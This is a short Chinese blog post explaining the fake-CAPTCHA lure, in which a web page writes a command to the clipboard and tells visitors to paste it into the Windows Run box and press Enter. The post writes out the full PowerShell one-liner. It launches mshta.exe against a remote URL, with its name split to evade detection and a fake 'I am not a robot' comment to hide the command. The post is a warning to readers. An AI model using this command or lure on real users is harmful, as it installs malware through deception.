利用社会工程学挂马！黑产都已经这么努力了？

要教会阅读：982 2025-03-31 14:19:38 评论：0

最近在网上看到一个关于黑产挂马的帖子，还蛮有意思的，分享给大家。

现在黑产有一种新的社会工程学挂马方案。

你访问一些网站的时候，网页忽然弹出提示，让你证明自己是真人。这倒也很常见，于是你点了一下那个验证窗口，又弹出提示，让你按 Win+R，然后 Ctrl+V，再回车。

你按下 Win+R，发现弹出一个窗口。再按 Ctrl+V，窗口里出现了：✅ 'I am not a robot: CAPTCHA Verification UID: 7811'。

这好像真的是在做验证。但这时只要你再按一下回车，你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候，网站向你的剪贴板中写入的内容实际是：

powershell -w 1 -C "$l='https://yaojiaohui.net/woshima.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框的宽度有限，对过长的输入行只显示末尾部分。攻击者精确地控制内容长度，巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候，已经晚了。

下图显然是一个受害者。

本文为要教会原创，欢迎转载分享。转载时请务必在文章页面明显位置提供本文链接并注明出处。感谢您对知识的尊重和对本文的肯定！本文链接网址：https://yaojiaohui.net/wangluoanquan/1290.html

标签:社会工程学黑产挂马安全研究工具系统监控工具暴力破解工具自动挂马安全测试工具渗透测试工具网络安全工具黑客工具

声明

1.本站遵循行业规范，任何转载的稿件都会明确标注作者和来源；2.本站的原创文章，请转载时务必注明文章作者和来源，不尊重原创的行为我们将追究责任；3.作者投稿可能会经我们编辑修改或补充。